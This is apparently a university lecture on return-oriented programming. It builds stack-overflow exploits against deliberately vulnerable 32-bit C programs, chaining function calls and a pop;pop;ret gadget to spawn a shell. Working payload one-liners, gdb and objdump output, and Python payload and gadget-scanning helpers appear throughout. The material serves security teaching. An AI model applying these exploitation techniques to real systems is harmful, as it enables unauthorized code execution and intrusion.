Lec. 23: Gadgets in Return Oriented Programs

1. Return Oriented Programming: Function Chaining Gadgets
2. ROP Gadgets

1 Return Oriented Programming: Function Chaining Gadgets

Return Oriented Programming (ROP) is the practice of building an exploit out of small sequences of code, called gadgets, that are already embedded in other code. The "return" part of the name comes from the fact that each of these gadgets ends with a return instruction. The idea is that while there may be protections in place to stop us from loading shell code, we can still leverage the code already within our target program.

An additional benefit of ROP, as with return-2-libc, is that a ROP chain still works when the stack is marked non-executable and when address space layout randomization (ASLR) is enabled. The reason is that we only use existing code to build the exploit, namely code in the .text segment, which is already marked executable. Moreover, for a binary that is not compiled as position independent, such as the ones in this lesson, the .text segment isn't randomized by ASLR, so its code is always in the same place. This makes this style of attack both powerful and consistent.

Below, we follow an example where we use ROP to properly chain function calls together; we will also look at an example where the ROP chain itself, without calling any other function, is capable of launching a shell. Also note that all the code we are working with in this lesson is compiled without executable stacks, so we can't easily load shell code ¹.

1.1 Overwriting the return address with function calls

Let's start with a simple example of where ROP becomes very useful. Consider the following code, where we want bad() to get called:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void bad(){
  printf("You've been PWNED!\n");

}

void vuln(char * s){
  char buf[100];

  strcpy(buf,s);

  printf("Buf: %s\n", buf);
}

void main(int argc, char * argv[]){

    vuln(argv[1]);
}

We know how to solve this one: we overflow the buffer and overwrite the return address of vuln() with the address of bad(). To do this, we first look at the disassembled code to see where the buffer sits in relation to the return address:

user@si485H-base:demo$ objdump -d -M intel call_bad
(...)
0804847d <bad>:
 804847d:	55                   	push   ebp
 804847e:	89 e5                	mov    ebp,esp
 8048480:	83 ec 18             	sub    esp,0x18
 8048483:	c7 04 24 70 85 04 08 	mov    DWORD PTR [esp],0x8048570
 804848a:	e8 c1 fe ff ff       	call   8048350 <puts@plt>
 804848f:	c9                   	leave  
 8048490:	c3                   	ret    
(...)
08048491 <vuln>:
 8048491:	55                   	push   ebp
 8048492:	89 e5                	mov    ebp,esp
 8048494:	81 ec 88 00 00 00    	sub    esp,0x88
 804849a:	8b 45 08             	mov    eax,DWORD PTR [ebp+0x8]
 804849d:	89 44 24 04          	mov    DWORD PTR [esp+0x4],eax
 80484a1:	8d 45 94             	lea    eax,[ebp-0x6c]
 80484a4:	89 04 24             	mov    DWORD PTR [esp],eax
 80484a7:	e8 94 fe ff ff       	call   8048340 <strcpy@plt>
 80484ac:	8d 45 94             	lea    eax,[ebp-0x6c]
 80484af:	89 44 24 04          	mov    DWORD PTR [esp+0x4],eax
 80484b3:	c7 04 24 83 85 04 08 	mov    DWORD PTR [esp],0x8048583
 80484ba:	e8 71 fe ff ff       	call   8048330 <printf@plt>
 80484bf:	c9                   	leave  
 80484c0:	c3                   	ret    
(...)

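We see that the buffer is allocated at ebp-0x6c. The saved ebp occupies the 4 bytes at ebp, and the return address sits just above it at ebp+4, so 0x6c+4 bytes of padding bring us to the return address, which we overwrite with the address of bad():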

user@si485H-base:demo$ ./call_bad `python -c "print 'A'*(0x6c+4) + '\x7d\x84\x04\x08'"`
Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}?
You've been PWNED!
Segmentation fault (core dumped)
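
The offset arithmetic in that command can be written out as a short Python 3 sketch. The helper name build_payload is hypothetical; the offset and the address of bad() are taken from the objdump listing above, and the byte order assumes the little-endian 32-bit x86 target used throughout.

```python
import struct

BUF_OFFSET = 0x6c      # buf starts at ebp-0x6c (from the lea in vuln)
SAVED_EBP = 4          # saved ebp sits between buf and the return address
BAD_ADDR = 0x0804847d  # address of bad() in the objdump listing

def build_payload(target):
    """Pad up to the return address, then append target as little-endian."""
    padding = b"A" * (BUF_OFFSET + SAVED_EBP)
    return padding + struct.pack("<I", target)

payload = build_payload(BAD_ADDR)
print(len(payload))     # 116
print(payload[-4:])     # b'}\x84\x04\x08'
```

The trailing bytes are the same '\x7d\x84\x04\x08' typed by hand in the one-liner; 0x7d happens to be the printable character '}', which is why it shows up at the end of the Buf: output.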

1.2 Functions with Arguments

We can make the exploit a little more interesting if bad() calls system() with its argument:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char pwn[]="/bin/sh";

void bad(char * s){
  printf("You've been PWNED!\n");

  system(s);

}

void vuln(char * s){
  char buf[100];

  strcpy(buf,s);

  printf("Buf: %s\n", buf);
}

void main(int argc, char * argv[]){

    vuln(argv[1]);
}

In this scenario, much like a return-2-libc attack, if we have the stack properly aligned with the right argument, namely pwn, then we'll get a shell to launch. For that to happen, we'll need the exploit on the stack to look like this:

|     <addr pwn>     |
|  bad's ret address |
|     <addr bad>     |

That is, the address of bad overwrites the return address of vuln. The next item in the stack will be bad's return address, which we don't need to worry about; however, the following item is the first argument to bad, which should be pwn.

To complete this exploit, we determine the address of pwn and bad, and give it a go.

user@si485H-base:demo$ gdb -q call_bad_sh
Reading symbols from call_bad_sh...done.
(gdb) x/x pwn
0x804a02c <pwn>:	0x6e69622f
(gdb) x/x bad
0x80484ad <bad>:	0x83e58955
(gdb) quit

user@si485H-base:demo$ ./call_bad_sh `python -c "print 'A'*(0x6c+4) + '\xad\x84\x04\x08' + '\xfe\xbe\xad\xde' + '\x2c\xa0\x04\x08'"`
Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?????,?
You've been PWNED!
$

That's not too bad.

1.3 Chaining Two Functions with Arguments

Let's add a bit more complexity to this exploit. Suppose now we want to make a call to another function first before calling bad(), and the arguments to those functions matter.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char pwn[100];

void bin_sh(int magicbeef){
  if (magicbeef == 0xdeadbeef){
    strcat(pwn,"/bin/sh");
  }
  printf("pwn: %s\n",pwn);

}

void bad(char * s){
  printf("You've been PWNED!\n");

  system(s);

}

void vuln(char * s){
  char buf[100];

  strcpy(buf,s);

  printf("Buf: %s\n", buf);
}

void main(int argc, char * argv[]){
  pwn[0]='\0';
  vuln(argv[1]);
}

This time we need to first call bin_sh() with magicbeef set to 0xdeadbeef, and then call bad() afterwards to get our shell. This might seem like no problem at first, but once we try it out, we'll see where the challenge arises.

Starting with the easy part, we can look at what the stack should be to properly call bin_sh:

|      0xdeadbeef       |
|  bin_sh's ret address |
|     <addr bin_sh>     |

We overwrite the return address of vuln() with the address of bin_sh(), whose argument is 0xdeadbeef. In the last example we didn't consider the return address of the function we jumped to, but this time we have to. What is the next function we call? bad(). So what we really need is for the stack to look like this:

|     <addr pwn>        |
|      0xdeadbeef       |
|     <addr bad>        |
|     <addr bin_sh>     |

If you follow the stack, the argument to bin_sh() is 0xdeadbeef and its return address is bad(). The argument to bad() is pwn, and the return address for bad is 0xdeadbeef, which doesn't matter because at this point we have the shell.
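
One way to check a layout like this before running it is to read it the way each callee will. The sketch below assumes the 32-bit cdecl convention used in these examples: on entry to a function, the word at the top of the stack is its return address and its arguments follow. The helper callee_view is a hypothetical name, and the three addresses are the ones gdb reports for call_bad_chain.

```python
BIN_SH, BAD, PWN = 0x080484ad, 0x08048505, 0x0804a060

# Words placed on the stack, starting at vuln's overwritten return address
# (lowest address first, i.e. the diagram read from bottom to top).
chain = [BIN_SH, BAD, 0xdeadbeef, PWN]

def callee_view(chain, index, nargs):
    """Return (return_address, args) as seen by the function at chain[index].

    When a ret jumps to chain[index], esp moves to the next word, which the
    callee treats as its return address; its arguments come right after.
    """
    ret = chain[index + 1]
    args = chain[index + 2 : index + 2 + nargs]
    return ret, args

ret, args = callee_view(chain, 0, 1)      # bin_sh(magicbeef)
print(hex(ret), [hex(a) for a in args])   # 0x8048505 ['0xdeadbeef']

ret, args = callee_view(chain, 1, 1)      # bad(s)
print(hex(ret), [hex(a) for a in args])   # 0xdeadbeef ['0x804a060']
```

The second call shows the overlap directly: the word that serves as bin_sh's argument is the same word bad() will use as its return address.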

Let's give it a try:

user@si485H-base:demo$ gdb -q call_bad_chain
Reading symbols from call_bad_chain...done.
(gdb) x/x pwn
0x804a060 <pwn>:	0x00000000
(gdb) x/x bad
0x8048505 <bad>:	0x83e58955
(gdb) x/x bin_sh
0x80484ad <bin_sh>:	0x57e58955
(gdb) quit
user@si485H-base:demo$ ./call_bad_chain `python -c "print 'A'*(0x6c+4) + '\xad\x84\x04\x08' +'\x05\x85\x04\x08' +'\xef\xbe\xad\xde' + '\x60\xa0\x04\x08'"`
Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?ﾭ?`?
pwn: /bin/sh
You've been PWNED!
$

It's a shell! Great.

1.4 Chaining Three or More Functions with Arguments

It's about to fall apart. Consider what happens when we need to call another function in this chain. Where could it go? Right now we have this.

|     <addr pwn>        |
|      0xdeadbeef       | <-- bad's return address is bin_sh's argument
|     <addr bad>        |
|     <addr bin_sh>     |

The slot for bad's return address is already being used for the argument to bin_sh. We're hosed. Worse, consider what would happen in this code example where one of the functions needs to take two arguments:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char pwn[100];

void add_bin(int magiccafe, int magicfood){
  if (magiccafe == 0xcafebabe && magicfood == 0x0badf00d){
    strcat(pwn,"/bin");
  }

  printf("add_bin: pwn: %s\n", pwn);
}


void add_sh(int magicbeef){
  if (magicbeef == 0xdeadbeef){
    strcat(pwn,"/sh");
  }

  printf("add_sh: pwn: %s\n", pwn);
}


void bad(char * s){
  printf("You've been PWNED!\n");

  system(s);

}

void vuln(char * s){
  char buf[100];

  strcpy(buf,s);

  printf("Buf: %s\n", buf);
}

void main(int argc, char * argv[]){
  pwn[0]='\0';
  vuln(argv[1]);
}

Now the construction of the /bin/sh string is in two parts, and one of the functions requires two arguments. It looks like our luck has run out and this is impossible, but just in case, let's look at the stack anyway.

Starting with the first function, add_bin, and its two arguments, which should be followed by add_sh, we'd need something like this:

|      0x0badf00d      |
|      0xcafebabe      |
|      <addr add_sh>   |
|     <addr add_bin>   |

That's possible, but then we reach an impasse: add_sh() takes one argument, and the way the stack is aligned, that argument is 0x0badf00d (add_sh() treats 0xcafebabe as its return address and the next word as its argument). That's just not what we need; we need 0xdeadbeef.

It would seem like this is impossible, but think about what we could do if we were able to clear the stack. Suppose we had a gadget, a little piece of code that only did pop;pop;ret. Then we could return there instead of to add_sh() and clear add_bin's arguments off the stack before the next return. Something like the following:

|     <addr pwn>         |
|     0xdeadbeef         |
|     <addr bad>         |
|     <addr add_sh>      |
|     0x0badf00d         |
|     0xcafebabe         |
|     <addr pop;pop;ret> |
|     <addr add_bin>     |

If you follow the function chain, after add_bin() is called with arguments 0xcafebabe and 0x0badf00d, the next thing to run is a gadget that pops 0xcafebabe and 0x0badf00d off the stack. When the gadget returns, the next address on the stack is add_sh(), with the argument 0xdeadbeef. The return address of add_sh() is bad(), and thus the exploit completes.
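
To make the control flow concrete, here is a toy walk-through in Python. It is only a model under stated assumptions: cdecl callees leave the stack as they found it and end in ret, the gadget pops two words and then rets, and the names run_chain, FUNCS and the symbolic "addresses" are hypothetical stand-ins rather than values from the binary.

```python
# Symbolic "addresses" (hypothetical labels, not real values from the binary)
ADD_BIN, ADD_SH, BAD = "add_bin", "add_sh", "bad"
POP_POP_RET, PWN = "pop;pop;ret", "pwn"

# Number of arguments each function reads from the stack
FUNCS = {ADD_BIN: 2, ADD_SH: 1, BAD: 1}

def run_chain(stack):
    """Follow rets through stack (lowest address first) and log each call."""
    calls = []
    sp = 0                          # index of the word the next ret will pop
    while sp < len(stack):
        target = stack[sp]
        sp += 1                     # ret pops the target address
        if target == POP_POP_RET:
            sp += 2                 # the gadget discards two words, then rets
        elif target in FUNCS:
            # On entry stack[sp] is the return address, arguments follow it.
            args = stack[sp + 1 : sp + 1 + FUNCS[target]]
            calls.append((target, args))
            if target == BAD:       # system() gives us the shell; stop here
                break
        else:
            break                   # returned into something that is not code
    return calls

naive = [ADD_BIN, ADD_SH, 0xcafebabe, 0x0badf00d]
fixed = [ADD_BIN, POP_POP_RET, 0xcafebabe, 0x0badf00d,
         ADD_SH, BAD, 0xdeadbeef, PWN]

for name, args in run_chain(fixed):
    print(name, [a if isinstance(a, str) else hex(a) for a in args])
```

Running run_chain(naive) instead shows add_sh receiving 0x0badf00d, which is the impasse described above; with the gadget in place each function sees the arguments intended for it.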

2 ROP Gadgets

We've been doing a bit of return oriented programming already, but now we really get into it. The big idea so far was to chain a bunch of functions together through their return addresses to complete a task. That is a form of return oriented programming, but now we need something different: a very specific sequence of instructions, pop;pop;ret, which is not a typical function that we can write. How do we find such a thing?

The answer lies in the code itself. While we as C programmers will never explicitly write a function that is just pop;pop;ret, the C compiler will almost certainly emit code that contains that sequence of instructions. We describe that sequence as a gadget because it unintentionally gives us the functionality we need, and it ends in a return instruction so it can be chained with other function calls.

2.1 Hunting a Gadget

The key now is to hunt down the gadget we need. For that, we can use objdump and grep. For reference, the -A option to grep prints the specified number of lines after each match, and the -B option prints the specified number of lines before each match.

user@si485H-base:demo$ objdump -d -M intel call_bad_doublechain | grep -B 3  ret | grep -A 3 pop  
 8048335:	5b                   	pop    ebx
 8048336:	c3                   	ret    
--

--
 8048508:	5f                   	pop    edi
 8048509:	5d                   	pop    ebp
 804850a:	c3                   	ret    
--
 8048556:	83 c4 14             	add    esp,0x14
 8048559:	5f                   	pop    edi
 804855a:	5d                   	pop    ebp
 804855b:	c3                   	ret    
--
 8048571:	89 04 24             	mov    DWORD PTR [esp],eax
--
 804862d:	5e                   	pop    esi
 804862e:	5f                   	pop    edi
 804862f:	5d                   	pop    ebp
 8048630:	c3                   	ret    
--
 804863f:	90                   	nop
--
 8048656:	5b                   	pop    ebx
 8048657:	c3                   	ret

The search above looked for any ret instruction, printing the 3 preceding lines; the second grep then searched that output for a pop instruction, printing the 3 lines after it. The result shows us an instance of pop;pop;ret at address 0x08048508 (there are others, for example at 0x08048559). What matters for this gadget is not which registers the data is popped into; any register other than esp itself is fine, as long as two words are popped off the stack before the ret.
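
The same hunt can be done on raw bytes rather than on objdump text. On 32-bit x86, pop into a general-purpose register is the single byte 0x58 through 0x5f and a near ret is 0xc3, so a pop;pop;ret gadget is any three-byte run matching that pattern. The sketch below assumes the code bytes and their load address are already in hand; find_pop_pop_ret is a hypothetical helper, and the sample bytes are copied from the listing at 0x8048556.

```python
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RET = 0xC3

def is_pop(byte):
    """True for one-byte 'pop r32' opcodes, skipping pop esp (0x5c),
    which would move the stack pointer and derail the chain."""
    return 0x58 <= byte <= 0x5F and byte != 0x5C

def find_pop_pop_ret(code, base):
    """Yield (address, description) for each pop;pop;ret found in code."""
    for i in range(len(code) - 2):
        a, b, c = code[i], code[i + 1], code[i + 2]
        if is_pop(a) and is_pop(b) and c == RET:
            desc = "pop %s; pop %s; ret" % (REGS[a - 0x58], REGS[b - 0x58])
            yield base + i, desc

# add esp,0x14; pop edi; pop ebp; ret  (bytes from the objdump output)
sample = bytes([0x83, 0xC4, 0x14, 0x5F, 0x5D, 0xC3])
for addr, desc in find_pop_pop_ret(sample, 0x8048556):
    print(hex(addr), desc)   # 0x8048559 pop edi; pop ebp; ret
```

Because it scans every byte offset, a search like this can also turn up sequences that start in the middle of an intended instruction, which the grep over disassembly lines would not show.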

2.2 Using the gadget

With this information in place, we can complete the exploit by first identifying the other important addresses and lining up our stack like below:

|     <addr pwn>         |
|     0xdeadbeef         |
|     <addr bad>         |
|     <addr add_sh>      |
|     0x0badf00d         |
|     0xcafebabe         |
|     <addr pop;pop;ret> |
|     <addr add_bin>     |

We can use gdb to find the other addresses:

user@si485H-base:demo$ gdb -q call_bad_doublechain
Reading symbols from call_bad_doublechain...done.
(gdb) x/x add_bin
0x80484ad <add_bin>:	0x57e58955
(gdb) x/x add_sh
0x804850b <add_sh>:	0x57e58955
(gdb) x/x bad
0x804855c <bad>:	0x83e58955
(gdb) x/x pwn
0x804a060 <pwn>:	0x00000000
(gdb) quit

user@si485H-base:demo$ ./call_bad_doublechain `python -c "s='A'*(0x6c+4); 
s+='\xad\x84\x04\x08'; 
s+='\x08\x85\x04\x08'; 
s+='\xbe\xba\xfe\xca';
s+='\x0d\xf0\xad\x0b';
s+='\x0b\x85\x04\x08';
s+='\x5c\x85\x04\x08';
s+='\xef\xbe\xad\xde';
s+='\x60\xa0\x04\x08';
print s; "`
?uf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA????

 \ﾭ?`?
add_bin: pwn: /bin
add_sh: pwn: /bin/sh
You've been PWNED!
$
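
For longer chains the inline one-liner gets hard to read, so it can help to build the payload in a small script. The following Python 3 sketch packs the same eight words in stack order; the addresses are the ones found with gdb and grep above, while p32 and build_chain are hypothetical helper names. It also rejects NUL bytes, since strcpy() stops copying at the first one.

```python
import struct

def p32(value):
    """Pack a 32-bit value as little-endian bytes."""
    return struct.pack("<I", value)

def build_chain(words, offset=0x6c + 4):
    """Return padding followed by each word, lowest stack address first."""
    payload = b"A" * offset + b"".join(p32(w) for w in words)
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy would truncate it")
    return payload

payload = build_chain([
    0x080484ad,  # add_bin
    0x08048508,  # pop edi; pop ebp; ret
    0xcafebabe,  # add_bin argument 1 (magiccafe)
    0x0badf00d,  # add_bin argument 2 (magicfood)
    0x0804850b,  # add_sh
    0x0804855c,  # bad
    0xdeadbeef,  # add_sh argument (magicbeef)
    0x0804a060,  # bad argument: address of pwn
])
print(len(payload))   # 144
```

To hand the result to the program from Python 3, the raw bytes would be written with sys.stdout.buffer.write(payload) rather than print, so that no text encoding is applied to them.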

2.3 Where do we go from here?

In this example, we used a gadget within the code to do the simple task of chaining functions with different numbers of arguments. What if we were to do something more interesting? What if we were able to find enough gadgets to build a complete exploit? That is the idea behind full ROP exploits, and believe it or not, you can build a complete exploit that does the work of shell code using only small gadgets. And, yes, it is as awesome as it sounds!

Footnotes:

¹ Many of the ROP examples are adapted from the Code Arcana article by Alex Reece, Tue 28 May 2013.